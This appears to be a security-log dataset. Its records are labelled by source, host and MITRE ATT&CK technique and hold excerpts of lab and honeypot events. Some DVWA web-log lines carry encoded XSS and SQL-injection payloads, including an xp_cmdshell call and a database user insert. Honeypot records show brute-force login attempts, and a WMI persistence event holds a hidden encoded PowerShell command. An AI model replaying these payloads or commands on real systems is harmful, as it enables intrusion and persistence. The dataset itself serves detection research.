192.168.204.1 - - [06/Oct/2023:01:22:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3ciframe%20name%3da%20srcdoc%3d%22&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 8. 192.168.204.1 - - [06/Oct/2023:01:22:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3ciframe%20srcdoc%3d'%3ca%20id%3dc%20name%3dd%20href%3dcid%3aClobbered%3etest%3c%2fa%3e%3ca%20id%3dc%3e'%20name%3db%3e%22%3e%3c%2fiframe%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537 || 9. 192.168.204.1 - - [06/Oct/2023:01:22:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cscript%3ex%2ey%2eforEach(element%3d%3ealert(element))%3c%2fscript%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 10. 192.168.204.1 - - [06/Oct/2023:01:22:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cscript%3ealert(x%2ey%2evalue)%3b%3c%2fscript%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 11. 192.168.204.1 - - [06/Oct/2023:01:22:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cform%20id%3dx%20name%3dy%3e%3cinput%20id%3dz%3e%3c%2fform%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 12. 192.168.204.1 - - [06/Oct/2023:01:22:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cscript%3ealert(x%2ey)%3c%2fscript%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
9
OTRF-Security-Datasets-compound
windows
MKT01.pandalab.com
12
Credential Access
T1003.001
2023-08-15T12:53:46.173000+03:00
2023-09-06T10:23:56.118000+03:00
1. Pipe Connected: RuleName: - EventType: ConnectPipe UtcTime: 2023-08-16 04:53:46.118 ProcessGuid: {81056205-d0f9-64d4-2700-000000000800} ProcessId: 1564 PipeName: \VBoxTrayIPC-stevie.marie Image: C:\Windows\System32\VBoxService.exe User: NT AUTHORITY\SYSTEM || 2. CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="System.Diagnostics.Eventing.Reader.EventLogSession" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = 96fd6e52-0c78-48ee-8e99-f42e47a95abc Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5 || 3. RawAccessRead detected: RuleName: - UtcTime: 2023-08-16 04:53:46.118 ProcessGuid: {81056205-5655-64dc-2104-000000000800} ProcessId: 7848 Image: C:\Windows\System32\wbem\WmiPrvSE.exe Device: \Device\Harddisk0\DR0 User: NT AUTHORITY\NETWORK SERVICE || 4. RawAccessRead detected: RuleName: - UtcTime: 2023-08-16 04:53:46.118 ProcessGuid: {81056205-5655-64dc-2104-000000000800} ProcessId: 7848 Image: C:\Windows\System32\wbem\WmiPrvSE.exe Device: \Device\Harddisk0\DR0 User: NT AUTHORITY\NETWORK SERVICE || 5. CommandInvocation(Get-Date): "Get-Date" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = 96fd6e52-0c78-48ee-8e99-f42e47a95abc Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5.1.19041.1682 Runspace ID = e3a65ad4-0b3f-48ae-905b-8887f9b26535 Pipeline ID = 65 Command Name = Get-Date Comm || 6. RawAccessRead detected: RuleName: - UtcTime: 2023-08-16 04:53:46.118 ProcessGuid: {81056205-5655-64dc-2104-000000000800} ProcessId: 7848 Image: C:\Windows\System32\wbem\WmiPrvSE.exe Device: \Device\Harddisk0\DR0 User: NT AUTHORITY\NETWORK SERVICE || 7. CommandInvocation(Collection-Start.ps1): "Collection-Start.ps1" CommandInvocation(Out-Default): "Out-Default" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = 96fd6e52-0c78-48ee-8e99-f42e47a95abc Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5.1.19041.1682 Runspace ID = e3a65ad4-0b3 || 8. prompt || 9. RawAccessRead detected: RuleName: - UtcTime: 2023-08-16 04:53:46.903 ProcessGuid: {81056205-5655-64dc-2104-000000000800} ProcessId: 7848 Image: C:\Windows\System32\wbem\WmiPrvSE.exe Device: \Device\Harddisk0\DR0 User: NT AUTHORITY\NETWORK SERVICE || 10. RawAccessRead detected: RuleName: - UtcTime: 2023-08-16 04:53:46.903 ProcessGuid: {81056205-5655-64dc-2104-000000000800} ProcessId: 7848 Image: C:\Windows\System32\wbem\WmiPrvSE.exe Device: \Device\Harddisk0\DR0 User: NT AUTHORITY\NETWORK SERVICE || 11. RawAccessRead detected: RuleName: - UtcTime: 2023-08-16 04:53:46.903 ProcessGuid: {81056205-5655-64dc-2104-000000000800} ProcessId: 7848 Image: C:\Windows\System32\wbem\WmiPrvSE.exe Device: \Device\Harddisk0\DR0 User: NT AUTHORITY\NETWORK SERVICE || 12. RawAccessRead detected: RuleName: - UtcTime: 2023-08-16 04:53:47.103 ProcessGuid: {81056205-5655-64dc-2104-000000000800} ProcessId: 7848 Image: C:\Windows\System32\wbem\WmiPrvSE.exe Device: \Device\Harddisk0\DR0 User: NT AUTHORITY\NETWORK SERVICE
10
BRAWL-Dataset
windows
kressierer-pc
12
Execution
T1059.001
2017-05-01T21:58:11.737000+03:00
2017-05-01T23:22:13.538000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 3. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 5. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 8. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 11. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 12. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
11
BOTS-v3-Splunk
windows
PCERF-L
12
Execution
T1059
2018-07-25T21:25:00+03:00
2018-08-21T13:43:47+03:00
1. 2018-07-25 18:25:00 ERROR [HandleAwsError @ awserr.go.48] [instanceID=i-08e52f8b5a034012d] [MessagingDeliveryService] error when calling AWS APIs. error details - GetMessages Error: AccessDeniedException: User: arn:aws:sts::622676721278:assumed-role/EC2InstanceRole/i-08e52f8b5a034012d is not authorized to perform: ec2messages:GetMessages on resource: * status code: 400, request id: 0a944f51-9038-1 || 2. 2018-07-25 18:25:02 ERROR [HandleAwsError @ awserr.go.48] [instanceID=i-08e52f8b5a034012d] [MessagingDeliveryService] error when calling AWS APIs. error details - GetMessages Error: AccessDeniedException: User: arn:aws:sts::622676721278:assumed-role/EC2InstanceRole/i-08e52f8b5a034012d is not authorized to perform: ec2messages:GetMessages on resource: * status code: 400, request id: 0c02ac5a-9038-1 || 3. 2018-07-25 18:25:04 ERROR [HandleAwsError @ awserr.go.48] [instanceID=i-08e52f8b5a034012d] [MessagingDeliveryService] error when calling AWS APIs. error details - GetMessages Error: AccessDeniedException: User: arn:aws:sts::622676721278:assumed-role/EC2InstanceRole/i-08e52f8b5a034012d is not authorized to perform: ec2messages:GetMessages on resource: * status code: 400, request id: 0d3b0527-9038-1 || 4. 2018-07-25 18:25:07 ERROR [HandleAwsError @ awserr.go.48] [instanceID=i-08e52f8b5a034012d] [MessagingDeliveryService] error when calling AWS APIs. error details - GetMessages Error: AccessDeniedException: User: arn:aws:sts::622676721278:assumed-role/EC2InstanceRole/i-08e52f8b5a034012d is not authorized to perform: ec2messages:GetMessages on resource: * status code: 400, request id: 0eb9b5ec-9038-1 || 5. 2018-07-25 18:25:09 ERROR [HandleAwsError @ awserr.go.48] [instanceID=i-08e52f8b5a034012d] [MessagingDeliveryService] error when calling AWS APIs. error details - GetMessages Error: AccessDeniedException: User: arn:aws:sts::622676721278:assumed-role/EC2InstanceRole/i-08e52f8b5a034012d is not authorized to perform: ec2messages:GetMessages on resource: * status code: 400, request id: 10335d15-9038-1 || 6. 2018-07-25 18:25:12 ERROR [HandleAwsError @ awserr.go.48] [instanceID=i-08e52f8b5a034012d] [MessagingDeliveryService] error when calling AWS APIs. error details - GetMessages Error: AccessDeniedException: User: arn:aws:sts::622676721278:assumed-role/EC2InstanceRole/i-08e52f8b5a034012d is not authorized to perform: ec2messages:GetMessages on resource: * status code: 400, request id: 117b6dd6-9038-1 || 7. 2018-07-25 18:25:14 ERROR [HandleAwsError @ awserr.go.48] [instanceID=i-08e52f8b5a034012d] [MessagingDeliveryService] error when calling AWS APIs. error details - GetMessages Error: AccessDeniedException: User: arn:aws:sts::622676721278:assumed-role/EC2InstanceRole/i-08e52f8b5a034012d is not authorized to perform: ec2messages:GetMessages on resource: * status code: 400, request id: 12da618b-9038-1 || 8. 2018-07-25 18:25:16 ERROR [HandleAwsError @ awserr.go.48] [instanceID=i-08e52f8b5a034012d] [MessagingDeliveryService] error when calling AWS APIs. error details - GetMessages Error: AccessDeniedException: User: arn:aws:sts::622676721278:assumed-role/EC2InstanceRole/i-08e52f8b5a034012d is not authorized to perform: ec2messages:GetMessages on resource: * status code: 400, request id: 144b566d-9038-1 || 9. 2018-07-25 18:25:18 ERROR [HandleAwsError @ awserr.go.48] [instanceID=i-08e52f8b5a034012d] [MessagingDeliveryService] error when calling AWS APIs. error details - GetMessages Error: AccessDeniedException: User: arn:aws:sts::622676721278:assumed-role/EC2InstanceRole/i-08e52f8b5a034012d is not authorized to perform: ec2messages:GetMessages on resource: * status code: 400, request id: 158d4c0b-9038-1 || 10. 2018-07-25 18:25:20 ERROR [HandleAwsError @ awserr.go.48] [instanceID=i-08e52f8b5a034012d] [MessagingDeliveryService] error when calling AWS APIs. error details - GetMessages Error: AccessDeniedException: User: arn:aws:sts::622676721278:assumed-role/EC2InstanceRole/i-08e52f8b5a034012d is not authorized to perform: ec2messages:GetMessages on resource: * status code: 400, request id: 16c69021-9038-1 || 11. 2018-07-25 18:25:23 ERROR [loop @ scheduler.go.56] [instanceID=i-08e52f8b5a034012d] [MessagingDeliveryService] MessagingDeliveryService stopped temporarily due to internal failure. We will retry automatically after 15 minutes || 12. 2018-07-25 18:26:21 ERROR [HandleAwsError @ awserr.go.48] [instanceID=i-0920036c8ca91e501] [MessagingDeliveryService] [Association] error when calling AWS APIs. error details - AccessDeniedException: User: arn:aws:sts::622676721278:assumed-role/EC2InstanceRole/i-0920036c8ca91e501 is not authorized to perform: ssm:ListInstanceAssociations on resource: arn:aws:ec2:us-west-1:622676721278:instance/i-0
12
SSH-Honeypot-2025
linux
d4c42200-4ac0-40b2-b4f1-7a3bea1f4ba7
6
Credential Access
T1110
2025-07-31T23:20:43.519332+03:00
2025-07-31T23:20:46.114893+03:00
1. Bot disconnected || 2. Bot entered username: root, password: abc123 || 3. Bot disconnected || 4. Bot entered username: oscar, password: oscar123 || 5. Bot disconnected || 6. Bot entered username: root, password: 1qaz@wsx
13
OTRF-Security-Datasets-atomic
windows
WORKSTATION5.theshire.local
12
Persistence
T1546.003
2020-09-04T23:43:10.163000+03:00
2020-09-04T23:49:42.958000+03:00
1. A process has exited. Subject: Security ID: S-1-5-20 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E4 Process Information: Process ID: 0x1678 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Exit Status: 0x0 || 2. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Account Manager Object Type: SAM_SERVER Object Name: SAM Handle ID: 0x1a0d0e94d40 Resource Attributes: - Process Information: Process ID: 0x2e8 Process Name: C:\Windows\System32\lsass.exe Access Request Information: Transaction ID: || 3. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Account Manager Object Type: SAM_DOMAIN Object Name: WORKSTATION5 Handle ID: 0x1a0d0e92a40 Resource Attributes: - Process Information: Process ID: 0x2e8 Process Name: C:\Windows\System32\lsass.exe Access Request Information: Transa || 4. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Account Manager Handle ID: 0x1a0d0e92a40 Process Information: Process ID: 0x2e8 Process Name: C:\Windows\System32\lsass.exe || 5. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Account Manager Handle ID: 0x1a0d0e94d40 Process Information: Process ID: 0x2e8 Process Name: C:\Windows\System32\lsass.exe || 6. RawAccessRead detected: RuleName: - UtcTime: 2020-09-04 20:43:26.984 ProcessGuid: {860ba2e3-a43a-5f52-0c00-000000000500} ProcessId: 744 Image: C:\Windows\System32\lsass.exe Device: \Device\HarddiskVolume1 || 7. RawAccessRead detected: RuleName: - UtcTime: 2020-09-04 20:43:26.984 ProcessGuid: {860ba2e3-a43a-5f52-0c00-000000000500} ProcessId: 744 Image: C:\Windows\System32\lsass.exe Device: \Device\HarddiskVolume1 || 8. RawAccessRead detected: RuleName: - UtcTime: 2020-09-04 20:43:27.015 ProcessGuid: {860ba2e3-a43a-5f52-0c00-000000000500} ProcessId: 744 Image: C:\Windows\System32\lsass.exe Device: \Device\HarddiskVolume1 || 9. RawAccessRead detected: RuleName: - UtcTime: 2020-09-04 20:43:27.015 ProcessGuid: {860ba2e3-a43a-5f52-0c00-000000000500} ProcessId: 744 Image: C:\Windows\System32\lsass.exe Device: \Device\HarddiskVolume1 || 10. WmiEventConsumer activity detected: RuleName: - EventType: WmiConsumerEvent UtcTime: 2020-09-04 20:43:27.015 Operation: Created User: THESHIRE\pgustavo Name: "Updater" Type: Command Line Destination: "C:\\windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonI -W hidden -enc SQBGACgAJABQAFMAVgBFAFIAUwBJAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAFIAUwBpAG8AbgAuAE0AQQBKAE8AUgAgAC0AZwBlACAAMwApAHsAJAA || 11. Namespace = //./root/subscription; Eventfilter = Updater (refer to its activate eventid:5859); Consumer = CommandLineEventConsumer="Updater"; PossibleCause = Binding EventFilter: instance of __EventFilter { CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 16, 130, 248, 123, 177, 146, 248, 217, 224, 170, 97, 56, 80, 4, 0, 0}; EventNamespace = "root\\CimV2"; Name = "Updater"; Query = "SELECT * FRO || 12. WmiPerfInst provider started with result code 0x0. HostProcess = wmiprvse.exe; ProcessID = 5708; ProviderPath = C:\Windows\System32\wbem\WmiPerfInst.dll
14
Linux-APT-Dataset-2024
linux
machine-1
11
Initial Access
T1190
2023-10-05T21:28:54.659000+03:00
2023-10-20T21:25:28.383000+03:00
1. 192.168.204.1 - - [06/Oct/2023:01:23:06 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%23%20Derived%20from%20the%20awesome%20%22Directory%20Traversal%20Fuzzing%20Code%22%20v0%2e2%20by%20Luca%20Carettoni&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) || 2. 192.168.204.1 - - [06/Oct/2023:01:23:19 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=1234%20'%20AND%201%3d0%20UNION%20ALL%20SELECT%20'admin',%20'81dc9bdb52d04dc20036dbd8313ed055&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Sa || 3. 192.168.204.1 - - [06/Oct/2023:01:23:19 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=1234%20%22%20AND%201%3d0%20UNION%20ALL%20SELECT%20%22admin%22,%20%2281dc9bdb52d04dc20036dbd8313ed055&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.593 || 4. 192.168.204.1 - - [06/Oct/2023:01:23:19 +0500] "GET /DVWA/vulnerabilities/xss_r/?name='%20AND%201%3d0%20UNION%20ALL%20SELECT%20'',%20'81dc9bdb52d04dc20036dbd8313ed055&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 5. 192.168.204.1 - - [06/Oct/2023:01:23:19 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%22%20AND%201%3d0%20UNION%20ALL%20SELECT%20%22%22,%20%2281dc9bdb52d04dc20036dbd8313ed055&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari || 6. 192.168.204.1 - - [06/Oct/2023:01:23:20 +0500] "GET /DVWA/vulnerabilities/xss_r/?name='%20UNION%20ALL%20SELECT%20system_user(),user()%3b%23&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 7. 192.168.204.1 - - [06/Oct/2023:01:23:20 +0500] "GET /DVWA/vulnerabilities/xss_r/?name='%20UNION%20ALL%20SELECT%201,%20@@version%3b%23&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 8. 192.168.204.1 - - [06/Oct/2023:01:23:20 +0500] "GET /DVWA/vulnerabilities/xss_r/?name='%3b%20exec%20master%2e%2exp_cmdshell%20'ping%2010%2e10%2e1%2e2'--&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 9. 192.168.204.1 - - [06/Oct/2023:01:23:20 +0500] "GET /DVWA/vulnerabilities/xss_r/?name='%20insert%20into%20mysql%2euser%20(user,%20host,%20password)%20values%20('name',%20'localhost',%20password('pass123'))%20--&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like || 10. 192.168.204.1 - - [06/Oct/2023:01:23:20 +0500] "GET /DVWA/vulnerabilities/xss_r/?name='%20insert%20into%20users(login,%20password,%20level)%20values(%20char(0x70)%20%2b%20char(0x65)%20%2b%20char(0x74)%20%2b%20char(0x65)%20%2b%20char(0x72)%20%2b%20char(0x70)%20%2b%20char(0x65)%20%2b%20char(0x74)%20%2b%20char(0x65)%20%2b%20char(0x72),char(0x64)&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 3 || 11. 192.168.204.1 - - [06/Oct/2023:01:23:20 +0500] "GET /DVWA/vulnerabilities/xss_r/?name='%20union%20(select%20NULL,%20(select%20@@version))%20--&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
15
OTRF-Security-Datasets-compound
windows
DC01.simulandlabs.com
12
Credential Access
T1649
1. - || 2. - || 3. - || 4. - || 5. - || 6. - || 7. - || 8. - || 9. - || 10. - || 11. - || 12. -
16
BRAWL-Dataset
windows
beane-pc
12
Execution
T1059.001
2017-05-01T21:57:45.161000+03:00
2017-05-01T23:21:47.179000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 3. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 5. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 8. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 11. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 12. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
17
BOTS-v3-Splunk
windows
BSTOLL-L
4
Discovery
T1082
1. "snapshot":[],"action":"snapshot","name":"pack_windows-hardening_Disallowed_Paths_ItemData","hostIdentifier":"BSTOLL-L","calendarTime":"Mon Aug 20 05:11:04 2018 UTC","unixTime":1534741864,"epoch":0,"counter":0,"decorations":{"host_uuid":"A1A94D56-2205-766E-E3B6-7D03D2B8445E","username":"BudStoll"}} || 2. "snapshot":[],"action":"snapshot","name":"pack_windows-hardening_DefaultLevelMachine","hostIdentifier":"MKRAEUS-L","calendarTime":"Mon Aug 20 05:53:19 2018 UTC","unixTime":1534744399,"epoch":0,"counter":0,"decorations":{"host_uuid":"46A44D56-CCB4-BA59-4D09-36B14D4AC99E","username":"MalloryKraeusen"}} || 3. "snapshot":[],"action":"snapshot","name":"pack_windows-hardening_AppCompat","hostIdentifier":"MKRAEUS-L","calendarTime":"Mon Aug 20 05:50:21 2018 UTC","unixTime":1534744221,"epoch":0,"counter":0,"decorations":{"host_uuid":"46A44D56-CCB4-BA59-4D09-36B14D4AC99E","username":"MalloryKraeusen"}} || 4. "snapshot":[],"action":"snapshot","name":"pack_windows-hardening_Unrestricted_Paths","hostIdentifier":"MKRAEUS-L","calendarTime":"Mon Aug 20 04:19:41 2018 UTC","unixTime":1534738781,"epoch":0,"counter":0,"decorations":{"host_uuid":"46A44D56-CCB4-BA59-4D09-36B14D4AC99E","username":"MalloryKraeusen"}}
18
SSH-Honeypot-2025
linux
8a1ecf15-a063-4ce8-8480-d85e7f1b47a5
5
Execution
T1059
2025-09-07T01:12:04.160442+03:00
2025-09-07T01:13:50.494141+03:00
1. ls || 2. whoami || 3. ды || 4. ls || 5. exit
19
OTRF-Security-Datasets-atomic
windows
MXS01.azsentinel.local
12
Persistence
T1505.003
2021-03-14T04:39:32.609000+03:00
2021-03-14T04:40:57.148000+03:00
1. Network connection detected: RuleName: - UtcTime: 2021-03-14 06:39:30.227 ProcessGuid: {6004D249-0957-604D-6019-000000000900} ProcessId: 12252 Image: C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeHMWorker.exe User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 127.0.0.1 SourceHostname: - SourcePort: 30000 SourcePortName: - DestinationIsIpv6: false D || 2. Network connection detected: RuleName: - UtcTime: 2021-03-14 06:39:30.227 ProcessGuid: {6004D249-FD90-604C-0100-000000000900} ProcessId: 4 Image: System User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: false SourceIsIpv6: false SourceIp: 127.0.0.1 SourceHostname: - SourcePort: 30000 SourcePortName: - DestinationIsIpv6: false DestinationIp: 127.0.0.1 DestinationHostname: - DestinationPort: 443 De || 3. Network connection detected: RuleName: - UtcTime: 2021-03-14 06:39:31.382 ProcessGuid: {6004D249-0957-604D-6019-000000000900} ProcessId: 12252 Image: C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeHMWorker.exe User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: true SourceIsIpv6: true SourceIp: 0:0:0:0:0:0:0:1 SourceHostname: - SourcePort: 30001 SourcePortName: - DestinationIsIpv6: tr || 4. Network connection detected: RuleName: - UtcTime: 2021-03-14 06:39:31.382 ProcessGuid: {6004D249-FD90-604C-0100-000000000900} ProcessId: 4 Image: System User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: false SourceIsIpv6: true SourceIp: 0:0:0:0:0:0:0:1 SourceHostname: - SourcePort: 30001 SourcePortName: - DestinationIsIpv6: true DestinationIp: 0:0:0:0:0:0:0:1 DestinationHostname: - DestinationPo || 5. Network connection detected: RuleName: - UtcTime: 2021-03-14 06:39:31.393 ProcessGuid: {6004D249-0EAC-604D-6B1A-000000000900} ProcessId: 16036 Image: C:\Windows\System32\inetsrv\w3wp.exe User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: true SourceIsIpv6: true SourceIp: fe80:0:0:0:b14f:e9ef:a6b2:f79f SourceHostname: - SourcePort: 30002 SourcePortName: - DestinationIsIpv6: true DestinationIp: fe80 || 6. Network connection detected: RuleName: - UtcTime: 2021-03-14 06:39:31.393 ProcessGuid: {6004D249-FD90-604C-0100-000000000900} ProcessId: 4 Image: System User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: false SourceIsIpv6: true SourceIp: fe80:0:0:0:b14f:e9ef:a6b2:f79f SourceHostname: - SourcePort: 30002 SourcePortName: - DestinationIsIpv6: true DestinationIp: fe80:0:0:0:b14f:e9ef:a6b2:f79f Destin || 7. File created: RuleName: - UtcTime: 2021-03-14 06:39:33.937 ProcessGuid: {6004D249-A6FD-604D-6126-000000000900} ProcessId: 23580 Image: C:\Windows\Sysmon.exe TargetFilename: C:\Archive\CLIP-A51B89E4A52F95D371B09F7B4A4087FC5A62B19024A7F31424AED247023A3B6CCECF7DA1EDDBB3524F3776A7E81376B5918FB80E6C1025DC6CAC32C088F7B9E7A1CCDBCB00000000000000000000000000000000 CreationUtcTime: 2021-03-14 06:39:33.937 || 8. Network connection detected: RuleName: - UtcTime: 2021-03-14 06:39:33.351 ProcessGuid: {6004D249-0957-604D-6019-000000000900} ProcessId: 12252 Image: C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeHMWorker.exe User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 127.0.0.1 SourceHostname: - SourcePort: 30003 SourcePortName: - DestinationIsIpv6: false D || 9. Network connection detected: RuleName: - UtcTime: 2021-03-14 06:39:33.351 ProcessGuid: {6004D249-FD90-604C-0100-000000000900} ProcessId: 4 Image: System User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: false SourceIsIpv6: false SourceIp: 127.0.0.1 SourceHostname: - SourcePort: 30003 SourcePortName: - DestinationIsIpv6: false DestinationIp: 127.0.0.1 DestinationHostname: - DestinationPort: 443 De || 10. Network connection detected: RuleName: - UtcTime: 2021-03-14 06:39:33.361 ProcessGuid: {6004D249-0957-604D-6019-000000000900} ProcessId: 12252 Image: C:\Program 